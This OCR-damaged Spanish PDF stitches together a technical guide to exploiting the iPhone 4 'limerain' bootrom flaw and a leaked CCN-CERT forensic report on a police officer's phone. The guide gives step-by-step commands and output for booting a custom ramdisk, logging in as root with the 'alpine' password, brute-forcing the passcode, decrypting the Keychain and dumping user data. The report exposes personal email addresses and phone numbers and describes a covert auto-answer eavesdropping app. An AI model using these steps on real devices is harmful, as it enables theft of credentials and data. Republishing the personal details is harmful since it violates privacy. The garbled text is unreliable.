Análisis técnico de la vulnerabilidad 'limerain' en el iPhone 4
5.
Proceso de explotación de la vulnerabilidad
Los siguientes pasos
detallan el proceso
a
seguir para explotar la vulnerabilidad 'limerain' en un
dispositivo móvil iOS objetivo, en este caso, un iPhone 4. En concreto, se hará uso de la vulnerabilidad 'limerain' para arrancar el dispositivo móvil desde una versión personalizada del sistema operativo iOS (creada durante el proceso de preparación previo) y que dispone de capacidades para obtener acceso completo al dispositivo mediante un shell (o línea de comandos), así como poder realizar
ataques de fuerza bruta sobre el código del acceso del dispositivo móvil. Una vez obtenido el código de acceso, es posible descifrar el Keychain, qué proporciona acceso a todas las credenciales (usuarios y contraseñas) y certificados del usuario, así como el contenido completo de la memoria del dispositivo móvil y acceder a la totalidad del sistema de archivos (incluyendo todos los ficheros y directorios). Estos pasos deben ser repetidos para cada dispositivo móvil objetivo específico que se desea explotar.
5.1
ExplotacIón de la vulnerabilidad
detallan como explotar la vulnerabilidad 'limerain' y hacer uso de iPhone Data Protection Tools para disponer de capacidades de ejecución en el dispositivo móvil objetivo.
Los siguientes pasos
51.1
Conexión del dispositivo móvil al ordenador
debe conectar el dispositivo móvil objetivo al ordenador mediante un cable USB, en concreto, el cable USB de Apple de 30 pines para el iPhone 4. En el caso de que iTunes detecte la presencia dei
Se
dispositivo móvil y arranque, debe permitirse su ejecución.
Una vez ha finalizado el proceso de arranque, tanto del dispositivo móvil (en caso de estar previamente apagado y haber arrancado al ser conectado al ordenador) como de iTunes (en caso de ejecutarse automáticamente al detectar el dispositivo), debe procederse a apagar el dispositivo móvil mediante el botón de encendido y apagado, siguiendo el método habitual, y cerrar iTunes. Una vez el dispositivo móvil se ha apagado completamente, se puede proceder al siguiente paso.
Al final de la ejecución del script "build.py", detallada en el apartado de preparación previo, se llevó
cabo la ejecución automática del script "boot.py", que
a su
a
vez ejecutó la herramienta redsnOw. En
este punto se debe hacer uso de dicha herramienta.
querer explotar la vulnerabilidad directamente en ocasiones posteriores, de nuevo directamente el script "boot.py" contra el dispositivo móvil iOS objetivo: En caso de
se
puede ejecutar
s cd $HONE/iDPT/iphone-dataprotection s ./boot.py
© 2016 DinoSec (www.dinosec.com)
Dr. (PhD) Ing. Miguel Gallardo
Page 23
perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
Análisis técnico de
Ia
www.cita.es/apedanica.pdf
PUBLICADO en www.cita.es/cni-iphone.pdf
vulnerabilidad 'limera in' en el iPhone 4
primer lugar es necesario arrancar el dispositivo móvil objetivo en modo DFU (Device Firmware Update), mediante un proceso de arranque personalizado que permite restaurar los dispositivos móviles de Apple31. Puede Ilevarse a cabo el proceso manual descrito a continuación, o seguir las instrucciones del mismo desde la ventana de redsnOw tras pulsar el botón "Next>": En
e
redsnOwO915b3
Please use the foItoIng ,nstructons to nter
I.
Ho4d down th. Power
con.) button
for I
<Back
DFU mod.
second.
.
Quit
i.
Asegurarse de que el dispositivo móvil está conectado al ordenador mediante un cable USB.
2.
Apagar el dispositivo móvil.
3.
Esperar a que el dispositivo móvil se apague completamente. Arrancar el dispositivo móvil manteniendo pulsado el botón de arranque (o botón de encendido V apagado) durante 3 segundos.
4.
5.
Pulsar el botón de arranque y de "Home" simultáneamente durante 10 segundos.
6.
Soltar el botón de arranque pero mantener pulsado el botón de "Home". Después de unos i5 segundos, redsnOw detectará que el dispositivo está en modo recuperación
7.
e
La
31
intentará ejecutar el exploit de 'limerain' automáticamente.
pantalla del dispositivo permanecerá en blanco (de color negro), sin ningún logotipo o imagen.
https://www.theiphonewiki.com/wiki/DFU_Mode
© 2016 DinoSec (www.dinosec.com)
Dr. (PhD) Ing. Miguel Gallardo
Page 25
perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf
PUBLICADO en www.cita.es/cni-iphone.pdf
--.------
Anáflsis técnico de la vunerabiIidad hrneraln en & iPhone 4
fnalice & proceso de explotación, redsnüw Jo indicará con & mensaje Done'. momento es posibe cerrar redsnüw medante & botón Quit:
Una vez
En caso de
tener éxito & expoit,
se visualizará una piña en la pantafla del
En ese
dispositivo móvfl durante el
proceso de arranque (en lugar de el logo de la manzana de Apple), seguida de mensajes de texto asociados al arranque personalizado a través de las Phone Data Protection Tools:
-
-
-
© 2016 DinoSec (www.dinoseccom)
Dr. (PhD) Ing. Miguel Gallardo
perito judicial investigador
Page 27
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf
PUBLICADO en www.cita.es/cni-iphone.pdf
Análisis técnico de la vulnerabilidad 'limerain' en el iPhone 4
primer lugar se debe ejecutar en un terminal el script "tcprelay.sh", incluido en las iPhone pata Protection Tools:
En
sh tcprelay.sh Forwarding local port 2222 to remote port 22 s
A continuación, es posible establecer una conexión con el dispositivo móvil mediante un cliente SSH
desde otro terminal
a
través de la redirección local, empleando el usuario root y la contraseña por
defecto, "alpine": s ssh -p 2222 root@localhost can't be [localhost] :2222 ([127.0.0.1] :2222) The authenticity of host established. RSA key fingerprint is 76:79:9c:19:77:c3:53:90:20:4f:a7:55:54:87:bl:fb. Are you sure you want to continue connecting (yes/no)? yes [localhost] :2222' (RSA) to the list of known Warning: Permanently added '
'
'
hosts. root@localhost' -sh-4
s
password:
.
Como resultado, se dispone de acceso con el usuario que dispone dei máximo nivel de privilegios en el dispositivo móvil, root, pudiendo ejecutar cualquier comando en ei mismo.
Incluso sin disponer del código de acceso, es posible montar los sistemas de ficheros del dispositivo móvil asociadas a las dos particiones existentes, la de sistema (donde reside el sistema operativo lOS) V la
de usuario (donde residen todos los datos asociados al usuario y apps):
-sh-4.O# ls -1 total 284 -rwxr-xr-x 1 mobile 20 106656 Feb 14 12:45 bruteforce -rwxr-xr-x 1 mobile 20 105776 Feb 14 12 45 device infos -rwxr-xr-x 1 mobile 20 66896 Feb 14 12:45 ioflashstoragekit 514 Feb 14 12:45 mount partitions.sh -rwxr-xr-x 1 mobile 20 -sh-4.O# pwd /var/ root -sh-4.O# mount /dev/mdü on / (hfs, local, noatime) devfs on /dev (devfs, local, nobrowse) -sh-4 O# /mountpartitions sh -sh-4.O# mount /dev/rndO on I (hfs, local, noatime) devfs on ¡dey (devfs, local, nobrowse) /dev/diskOslsl on /mntl (hfs, local, journaled, noatime) /dev/diskOsls2 on /mnt2 (hfs, local, journaled, noatime, protect) -sh-4 O# -sh-4.O# cd /inntl -sh-4.O# is -i :
.
.
.
.
© 2016 DinoSec (www.dinosec.com)
Dr. (PhD) Ing. Miguel Gallardo
perito judicial investigador
Page 29
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf
PUBLICADO en www.cita.es/cni-iphone.pdf
Análisis técnico de la vulnerabilidad 1imeraln' en el iPhone 4
python python_scripts/demo_bruteforce py 047ed583c983d0f4c1497b2cf79d7289502c014d Connecting to device 08cb4a03cd7f43f89fdc32626f6fde89 Keybag UUID Enter passcode or leave blank for bruteforce: s
.
:
:
Trying all 4-digits passcodes...
lo
of 10000 ETA: of 10000 ETA:
0:31:40
20
of 10000 ETA:
0:31:26
30 of 10000
ETA:
0:31:13
40 of 10000
ETA:
0:31:01
o
1220 of 10000 ETA:
0:26:17
1230 of 10000 ETA:
0:26:15
10000 of 10000 Time: 1
00
%
0:03:42
i
0:03:42.064051 'passcodeKey': f3baO4004lab2bec36cdfad7daeSd96l45aO4200d62elac37l3d2ab5ldaa8def' True System keybag (0) Keybag type 4 Keybag version 08cb4a03cd7f43f89fdc32626f6fde89 Keybag UUID
BruteforceSystemKeyBag {'passcode':
:
'1234',
!
}
:
:
:
WRAP Type
Class
.
kSeaAt Irkacassa blepheslalacked kaeaaktraaaessa bCoafteryars 105151k kIecAl trkceesea bleblsays kSeaAC trkccessa blepaealalaakedlhls lavicoOs ay kIecAt Crkcaessa bleAT terFiretlallckThis 11511005 by kIelAt trkaleasa bleAlwayslhislevicelnly
Ala ala All bEI AIS ASS
3 3 1 3 3 i
Downloaded keychain database, secrets
3
Public key
Key
3 Ala NSFaleyra Coalisa lampade 3 Curve2Slll NSFiJepro teChos CompleteUalessOyek cd2adfl533ela2la767Seeg97clklkbek3afbkdeflbk62edllS59bdO4Ofk44lB TIES NaFijepro tection Completeziatil First UserAk'thenticatioa 3 bES 3 NaFlleyateatiaa bocavory'
0812f8fa86d8a5ed9a8286a0b0a76444e2499kef3f9501c80374d13a1138coo5 a2613daba07825613ef9bdb9f7b903b85kk9ac9523k4f11417a82668d48k8da6
asabaaealc4e55eelralaf6d5l9db2O5245e64522ld7a8l83b64e5a47ldeb 85f16352b6a3a8249968e82e8b49bl97a7e67a5f294l700167b3a00faeaa13a5 a1ba9516341f8aaa20a9a2904aeba5f93058aek121c74a2b5342U743501a11c5 ba24a9e6ec14397b79aa5339791116e395a1a461e28f9fb72fa00b9394201519 O292abOdfafBblfSlf2bbllkbl7ae24cllblllöbkeelsSaaldG200b7f59ebbC2 b5elsdlfbf7el2llo5b6bcc2S62olldll3eblb545el4eelb7a4del2ll4SdTO24 l63d2f8585lea0fl481432l7lbld5a7d84ba5fk765499lkf3o3bTa463oa0lb47 bdl5eeal9keb3laeleEc27bfc2ealb4lbla2Sb4ealSlSd785a15aa42a27ae15c
files,
use keychaintool.py to decrypt
s s
ls
-1 047ed583c983d0f4c1497b2cf79d7289502c014d/
total 5224 -rw-r--r--rw-r--r--rw-r--r--rw-r--r--
1 1 1 1
usuario usuario usuario usuario
staff staff staff staff
10606 4096 32768 2624472
15 feb 19:57 55ee31f5bf824443.plist 15 feb 19:57 keychain-2.db 15 15
feb 19:57 keychain-2.db-shm feb 19:57 keychain-2.db-wal
s
Debido
a la
implementación de los mecanismos de cifrado existentes en los dispositivos móviles lOS,
dependientes de claves de cifrado almacenadas únicamente en el hardware de cada dispositivo,
© 2016 DinoSec (www.dinosec.com)
Dr. (PhD) Ing. Miguel Gallardo
perito judicial investigador
la
Page 31
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf
PUBLICADO en www.cita.es/cni-iphone.pdf
s
Análisis técnico de la vulnerabilidad 'limerain' en el iPhone 4
NOTA: Los ejemplos superiores no muestran información crítica o sensible dei usuario ya que,
a
propósito, el dispositivo móvil objetivo empleado había sido instalado recientemente y no disponía de datos de usuario relevantes. :
obtenido previamente, sería potencialmente posible alterar los diferentes componentes implicados en el arranque del dispositivo móvil lOS, como el LLB, iBoot y/o el kernel, de manera similar al proceso de jailbreak, para disponer permanentemente de las capacidades para instalar y/o ejecutar cualquier software en el dispositivo objetivo. Con el nivel de acceso
Con la información previa dei Keychain, es posible descifrar el contenido completo de la memoria del
dispositivo móvil y acceder a la totalidad dei sistema de archivos (incluyendo todos los ficheros y directorios), y a sus contenidos. siguiente secuencia de comandos y scripts permiten volcar
partición de datos (o de usuario, no así la de sistema ya que únicamente contiene la versión de iOS utilizada)32, a través de la conexión de TCP relay de SSH (siendo necesario introducir la contraseña de root en un par de ocasiones), al ordenador local y en concreto bajo el directorio de trabajo asociado al UDID del dispositivo móvil La
la
objetivo. Este proceso llevará bastantes minutos, dependiendo dei tamaño de dispositivo móvil objetivo, y en concreto, del tamaño de la partición de datos:
memoria del
la
sh tcprelay.sh Forwarding local port 2222 to remote port 22
s
/dump_datayartition sh s Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts. root@localhost s password: 047ed583c983d0f4cl497b2cf79d7289502c0l4d Device UDID Dumping data partition in .
.
'
:
047ed583c983d0f4c1497b2cf79d7289502c0l4d/data2Ol6O2l5-2043.dmg [localhost] :2222' (RSA) to the list of known Warning: Permanently added .
.
'
hosts.
root@localhost's password: dd: opening /dev/rdiskOs2sl': No such file or directory Connection to localhost closed by remote host. s
NOTA: Los errores anteriores son habituales y no interfieren con la adquisición de la partición.
Como resultado se creará un fichero .dmg con la fecha y hora actuales, que corresponde
a la
imagen
de la partición de datos (de 13,50 GB de tamaño para un iPhone 4 de 16 GB; el resto dei espacio
32
En este caso sí se
recomienda usar el nand-disable boot flag en el script boot.py.
© 2016 DinoSec (www.dinosec.com)
Dr. (PhD) Ing. Miguel Gallardo
perito judicial investigador
Page 33
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf
PUBLICADO en www.cita.es/cni-iphone.pdf
4I-
DIFUSIÓN LIMITADA 4
.
I
CCN-CERT
II-11/16
Teléfono ¡Phone 4
Cuerpo Nacional de
Policia
Marzo de 2016
DIFUSIÓN LIMITADA Dr. (PhD) Ing. Miguel Gallardo
perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
CCNCERT
IT
www.cita.es/apedanica.pdf DIFUSIÓN LIMITADA
PUBLICADO en www.cita.es/cni-iphone.pdf
11/16
LIMITACIÓN DE RESPONSABILIDAD Ei presente documento se proporciona de
acuerdo con los términos en él recogidos, rechazando expresamente cualquier tipo de garantía implícita que se pueda encont'rar" relacionada. En ningún caso, el Centro Criptológico Nacional puede ser considerado responsable del daño directo, indirecto, fortuito o extraordinario derivado de la utilización de la información y software que se indican incluso cuando se advierta de tal posibilidad. AVISO LEGAL
Quedan rigurosamente prohibidas, sin la autorización escrita del Centro Criptológico Nacional, bajo las sanciones establecidas en as leyes, la reproducción parcial o total de este documento por cualquier medio o procedimiento, comprendidos la reprografla y el tratamiento informático, y la distribución de ejemplares del mismo mediante alquiler o préstamo públicos.
------
Dr. (PhD) Ing. Miguel Gallardo
----------
DIFUSIÓN LIMITADA perito judicial investigador
---------
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
CCNCERT
1.
IT
www.cita.es/apedanica.pdf DIFUSIÓN LIMITADA
PUBLICADO en www.cita.es/cni-iphone.pdf
Teléfono Móvil iPhone 4
11/16
SOBRE CCN-CERT EI
CCN-CERT (www.ccn-cert.cni.es) es la
Capacidad de Respuesta a incidentes
de Seguridad de la Información dei Centro Criptológico Nacional, CCN. Este servicio se creó en ei año 2006 como CERI Gubernamental Nacional español y sus funciones quedan recogidas en la Ley i 1/2002 reguladora dei Centro Nacional de inteligencia. el RD 421/2004 de regulación del CCN y en ei RD 3/2010, de 8 de enero, regulador dei Esquema Nacional de Seguridad, modificado por el RD 951/2015, de 23 de octubre. De acuerdo a todas ellas, ei CCN-CERT tiene responsabiiidad en ciberataques sobre sistemas clasificados y sobre sistemas de las Administraciones Públicas y de empresas y organizaciones de interés estratégico para el país. Su misión, por tanto, es contribuir a la mejora de la ciberseguridad españoia, siendo el centro de aierta y respuesta nacional que coopere y ayude a responder de forma rápida y eficiente a ios ciberataques y a afrontar de forma activa ias ciberamenazas.
Dr. (PhD) Ing. Miguel Gallardo
DIFUSIÓN LIMITADA perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
_
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf DIFUSIÓN LIMITADA
Teléfono Móvil iPhone 4
CCN.CERT IT- 11/16
Í344S
nrbr
S1
PUBLICADO en www.cita.es/cni-iphone.pdf
»
J[
ct
CPy
(O ìWflcr
c
çrerttt
ApeW
33i? 34:E;3723
lSPd
<MY
1M!
Icou Wi h
z:z3F
MA
S!Jbkd
toc
c-rsr
ad
up
tV'k Apple
U's
W
USdK
NNWbt
UWUM4C
Tfl
>1iør4
thb
cwm WO
tACakniT
:
Figura 4-1. Detalles de la primera extracción
5. EVIDENCIAS
FORENSES
Se dispone de dos extracciones forenses realizadas sobre el mismo teléfono pero realizadas en distintos días. Los datos de las extracciones disponibles son los siguientes: (NP iPhone4GSM_7.1-7.1.2_Physical_17-12-14_11-05-32.img A7E253E4004BD41090885D26F96D4E7E8A42E5D3270A1F3675FFA60851360620 15 955 189.760 17/12/ - 2014 11:24:53 (UTC-i-1) Phone4GSM_7.1-7.1.2_Physical_17-12-14_11-05-32.UFD
NombreArchvo FirmaSHA»256 Tamaño (bytes)
Fechatreacíón Nombre ArchivoFirmaSHA-25& Tamaño (bytes} Eechacreacián
-
DFFEB83E1EE7D12BF1114BBF4B9EE6D1BOF7EF128725938BO3724926DDF83CAO 2 608
17/12/-2014 11:24:54 (UTC+1)
Exòd12 Fechaireacián Nombre Archivo
aIzaç por CCN iPhone4GSM_7.1-7.1.2_Physical_29-07-15_13-26-54.img 2260D0795551ED5EB6831E7057633FB1FE8C81731A8AE80367CB1C79000D1FD6 15 955 189.760 29/07/2015 - 13:26:55 (UTC+1) iPhone4G5M_7.1-7.1.2_Physical_29-07-15_13-26-54.UFD
Nombre Archivo RrmaSHA»256 Tamaflo (bytes}
firma SHA-256
OA969ADEB4F0002B3135DA2ADEOBOAAEF6O9CCDA6EA1198F158F1CB7A44F68E7
Tamatio (bys)
1
Iecha creación
29/07/2015 - 13:26:55 (UTC+1)
933
extracciones en distintas fechas y al no haber estado detenido el teléfono móvil, las extracciones presentan diversas diferencias motivadas a la actividad realizada por el usuario con el teléfono y a la interacción del teléfono móvil con las aplicaciones instaladas e Internet. Al realizarse las
Una de las diferencias existentes, es el número de cuentas asociadas a los servicios de Apple. Estas cuentas permiten, entre otras funciones, bajarse e instalar aplicaciones en el móvil, resolver incidencias, etc. En
la primera extracción (del 17/12/14) se han encontrando los siguientes "Apple
ID":
.
"
s
"
Dr. (PhD) Ing. Miguel Gallardo
rocioperezlorente@yahoo.es u telecomunicaciones.fax@gmail.com
I'
LIMITADA DIFUSIÓN perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
ccrcE:T
www.cita.es/apedanica.pdf DIFUSIÓN LIMITADA T&éfono
T
11/16
.
http://www.dinosec.com/docs/Android-
PUBLICADO en www.cita.es/cni-iphone.pdf
i
óvil
¡Phone 4
F
Back_to_fhe_Future_Too_Roofed2O i 5_RauISiIes-DinoSec_v i .O.pdf
.
http://www.youtube.com/watch?v=cEKu8Cwl Dyo
Adicionalmente, el dispositivo objeto dei informe presenta diversas vulnerabilidades CRÍTICAS, presentes en ei núcleo o SoC (System on Chip) modelo A4 que posee ei terminai, permitiendo ei control total dei teléfono, como por ejemplo las vulnerabilidades "limerai n' o Shatter" (https://www.theiphonewiki.com/wiki/SSL8930).
-
Figura 6-2. System on Chip A4 del ¡Phone 4
vulnerabilidades que afectan al hardware dei dispositivo SOLO se pueden evitar/solucionar SUSTITUYENDO ei dispositivo por un modelo más nuevo basado en otra versión de SoC no vulnerable. Estas
Adjunto al informe se presenta el documento "Análsis técnico de la vulnerabilidad "limera i n" en el iPhone 4" elaborado por el consultor de seguridad Raúl Siles de la empresa Dinosec, donde se recoge paso a paso cómo explotar la vulnerabilidad "limerain" y cómo instalar una aplicación que entre sus funcionalidades está la de responder de forma automática y sin la intervención dei usuario a algunas llamadas recibidas. Adicionalmente, la aplicación presenta un modo silencioso (Stealth Mode) para que ei teléfono no emita ningún sonido asociado a la llamada entrantre, de forma que el usuario no sea consciente de la misma, no mostrándose ni siquiera que hay una llamada activa y no dejando registro en ei histórico de llamadas recibidas. A
continuación se muestran diversas imágenes de la aplicación "Auto Answer".
Dr. (PhD) Ing. Miguel Gallardo
DIFUSIÓN LIMITADA perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
CCN-CERT
En
IT
www.cita.es/apedanica.pdf DIFUSIÓN LIMITADA
TeIéfono Móvil ¡Phone 4
11/16
cambio en la segunda extracción (del 29/07/1 5) TaIeV
-
es el siguiente:
'
-
«l
-
-
-
,
fp!icV
j -
PUBLICADO en www.cita.es/cni-iphone.pdf
-
-
rn'2G14 1?3O:174UTC+O)
om
_-:-__
mmbcEae ---
:
Figura 7-2. Registro actividad día 20/10/2014 perteneciente a la segunda extracción
7.1 REGISTRO DE LLAMADAS
dispositivos iPhone solo almacenan las últimas 100 llamadas (recibidas, realizadas, fallidas y borradas por el usuario), por lo que NO existen registros de llamadas en los días 20 y 21 de octubre de 2014. Los
existen registros de llamadas anteriores a esa fecha, pero son llamadas registradas por la aplicación "FaceTime" que poseen los iPhone, la cual permite establecer llamadas sobre IP (canal de datos) de audio y voz con otro terminal iPhone. Sí
Cuando el registro de llamadas alcanza el número máximo (100), la llamada más antigua registrada es borrada de forma automática para incluir la nueva, por lo que el registro de llamadas puede solo contener uno o dos días en aquellos usuarios que tengan un elevado tráfico de llamadas (rebicidas, realizadas o perdidas). 7.2 TELÉFONO 652972428 Los únicos datos que aparecen en teléfono 652972428" son dos: s
las distintas
extracciones del número de
Mensaje SMS remitido por la operadora móvil indicando "Llamada Perdida", el pasado día 7 de noviembre de 2014, como se observa en la siguiente imagen: prom: .34653fl42& UAMADAS Pf.fti DAS
St G1!2O14
-
-
O;4tUC+OWoId
Ex
Prties5Z3724 0041y
5Z9724Z8
--
-:chh UAMADA$ PEOA.
-
Figura 7-3. Registro existente dei teléfono 652972428
rn-__________
Dr. (PhD) Ing. Miguel Gallardo
LIMITADA DIFUSIÓN perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf DIFUSIÓN LIMITADA
PUBLICADO en www.cita.es/cni-iphone.pdf
CCNCERTIT11/16 teléfono, supuestamente, se encuentra encendido de manera ininterrumpida desde el día 30 de septiembre de 2014.
2014.
El
7.5 REDES WIFI A continuación se muestra la relación de puntos de acceso a los que se ha conectado el terminal, algunos de ellos son puntos de acceso NO controlados por
personal de la Organización.
5fuhZCZ4
7î'2O43G32WTC.O}
3(UTC*O1
ii33(UTCJ
I28/C9/2O$
V/OV2U4 1:37.52flJTCß
L
26fO9J2O4 17;1t1IUÍC.O
12?f9?2O4 144249LUÎC'.
I2o14 1754UTC-QJ
J251W2O14 18O3 4(lJTC.
jECDOCiC:EO 15E:31CI
I25J9/2OA 782i[UTC*G)
j2AA4 3C:O323
342UTC-O)
J2DI4 763JTc-O:
22ÌO9!2O14 I355tUTCO)
12í2Q4 1144 3UTC.O3 ]1/9Í2Q '2O14 II243(U1C.D)
fr-
CD144AD
2VO/Oi4 17372(UTCO
jfç4
_5DF
1A28AV-CC
jHOTSPOT.SAP orr
1aiaVed&WiF
1I2DFOOc
"-° I°°'
4OfUTCQ)
I1711{JTC3
1JW2i4 13146(UTCQJ 1WW2014 11Q2(UTC
th Paem
1F3FA22 3
P°' [.rpn
D1195OOW
7)TTh
HmaflT
29110/2013 1i4 I4jUTC.Oj jwiwci3 O53AOLUTCß
j2!13 17:55S5(uTC. --
-)7W
2ViO2O13 23=54=24CUTCc
J9iO2O13 I6IEWTC.0)
722B7DE31
I
22i632(UTC.03
29r1O'2O
t
-
--
=
=
»1Qk367kD
ndw m
825O -
-
-- - -RU)CAOSALUCAS
-
Figura 7-6. Redes WiFI a las que se ha conectado el Terminal
Como se ha observado en la imagen, la última red WiFi a la que se ha conectado el terminal para su acceso a redes públicas/privadas ha sido una red con el nombre SSId "WLAN_59DF".
8. TRÁFICO
DE DATOS
En el teléfono solo existen datos registrados por aquellas aplicaciones que se encuentran instaladas y que por su operatividad diaria pueden guardar datos de utilización, entre ellas se encuentran, el cliente de correo electrónico, el navegador empleado (Safari) y los programas de mensajería/chat (Whatsapp).
han encontrado el siguiente tráfico de datos correspondiente a visita de páginas web, envío de SMS o envío de correo electrónico siguientes: Se
Día
- HORA (uTc+o)
20/10/2014
- 17:30:17
20/10/2014
- 21:33:21
21/10/2014-08:03:55 21/10/2014 10:32:24
-
21/10/2014 - 14:05:06 21/10/2014 - 13:51:07
Dr. (PhD) Ing. Miguel Gallardo
Tipo de tráfico Correo electrónico de para info@casassg.com Correo electrónico de deltoroalinfinito@gmail.com para mmartin@policia.es SMS BBVA Móvil Correo electrónico de ¡lfruiz@policia.es para mmartin@policia.es 5M5 Llamada perdida al n2 659967760 Visita página Web de 2ominutos.es
nicia.es
DIFUSIÓN LIMITADA perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf DIFUSIÓN LIMITADA
PUBLICADO en www.cita.es/cni-iphone.pdf I
CCNCERT
IT
Teéfono Móvil iPhone 4
11/16
4
com.indra.md. Por la información residual, el dispositivo se ha identificado como cliente con archivo número "W6BZ4M63461 I', según indica el "/Data/mobile/Applications/CAEA91 69-AF2A-4ODB-BC79-F2A8583E345C/Mobiledesk MDM.app".
Supuestamente, el último intento de conexión se realizó el pasado día noviembre de 2013 a las 15:16:10 (UTC+O).
12
de
Se ha observado que la aplicación actualizó sus datos el pasado día 6 de julio de 2013 a las 07:58:36 (UTC+O), desde entonces, no se ha observado actividad relevante.
9.2 COMSec La
aplicación "COMSec" permite comunicaciones seguras entre aquellos
dispositivos que posean la misma aplicación.
archivo información residual encontrada en el /Data/mobile/Applications/A5B88281 -1 C6A-4EBE-AC26EBEFC969OFOB/Documents/logfile.txt" indica que, supuestamente, el último intento de conexión se realizó el pasado día 26 de diciembre de 2013 a las 18:14:11 (UTC+O). La
lo.
BORRADO DE APLICACIONES
Existen distintos métodos para eliminar del terminal aplicaciones o incluso archivos, como por ejemplo:
Desde el icono mostrado en el terminal y seleccionando la opción "desinstalar" . s
s
Desde un equipo con ¡Tunes y conectado el móvil a través del cable
USB.
Instalando aplicaciones "válidas" cuya función sea el borrado de información o la liberación de espacio, como por ejemplo "PhoneExpander" y "PhoneClean".
Iniciando el móvil con alguno de los modos especiales e instalando cualquier aplicación cuya función sea la de borrado, como por ejemplo "iCleaner".
Independientemente del método o aplicación empleados, si se realiza con éxito, el sistema operativo generalmente no registra este tipo de acciones.
i i.
CONCLUSIONES La
evidencia forense indica que: s
teléfono móvil presenta vulnerabilidades críticas que pueden permitir el control total, tanto de forma local como remota, de TODAS las funcionalidades del mismo, pudiéndose realizar cualquier acción sobre el dispositivo como añadir aplicaciones, borrar archivos, borrar registros, etc. El
Dr. (PhD) Ing. Miguel Gallardo
LIMITADA DIFUSIÓN perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
Asociación APEDANICA Tel. 902998352
www.cita.es/apedanica.pdf DIFUSIÓN LIMITADA
PUBLICADO en www.cita.es/cni-iphone.pdf
TeléfonoMóvilïPhone4
CCNCERTIT-11/16
aplicación "hunes", pudiendo no quedar información residual de acciones realizadas.
las
dispositivos móviles suelen tener una tarea programada que de forma automática gestiona el disco de estado solido que emplean para optimizar el rendimiento de sus terminales, por lo que la información borrada pasado un tiempo, suele ser destruida de forma automática. Los
12.
.
El
.
El
teléfono se ha conectado a puntos de acceso WIFI públicos que pueden incrementar el número de riesgos y amenazas. teléfono se ha actualizado o se ha vuelto a reinstalar la versión 7.1.2 (1 1D257) el pasado día 30 de septiembre de 2014.
Poc
puede ampliar cualquier punto del informe, utilizando como via preferente de comunicación el portal hfft://www.ccn-cert.cni.es Se
>
Teléfono: +34
>
E-Mail: ccn-cert@cni.es
91
372 59 74
Para comprender la importancia y trascendencia de este documento recomendamos leer http://www.cita.es/juzgado-iphone.pdf http://www.cita.es/habeas-smartphone.pdf y en inglés http://www.cita.es/fcc-complaint http://www.miguelgallardo.es/fcc-complaint.pdf En la asociación APEDANICA estamos a la disposición de todo el que pueda aportar documentos, testimonios y pericias contra el espionade de teléfonos móviles y también de antenas falsas IMSI-CHATHERS o STINGRAYS como las denunciadas en http://www.cita.es/querella-ai y http://www.miguelgallardo.es/querella-ai.pdf http://www.cita.es/ampliando-ai y http://www.miguelgallardo.es/ampliando-ai.pdf http://www.cita.es/reitera-ai y http://www.miguelgallardo.es/reitera-ai.pdf El Juzgado de Instrucción 2 de Madrid ha ignorado esos tres documentos, y también http://www.cita.es/juzgado-iphone.pdf por lo que han sido 4 los documentos ignorados. Nos remitimos a todos ellos y a http://www.miguelgallardo.es/ignorancia-deliberada.pdf ofreciendo nuestro teléfono (+34) 902998352 y el email: apedanica.ong@gmail.com
Dr. (PhD) Ing. Miguel Gallardo
DIFUSIÓN LIMITADA perito judicial investigador
www.miguelgallardo.es/audio.pdf
PDF compression, OCR, web optimization using a watermarked evaluation copy of CVISION PDFCompressor
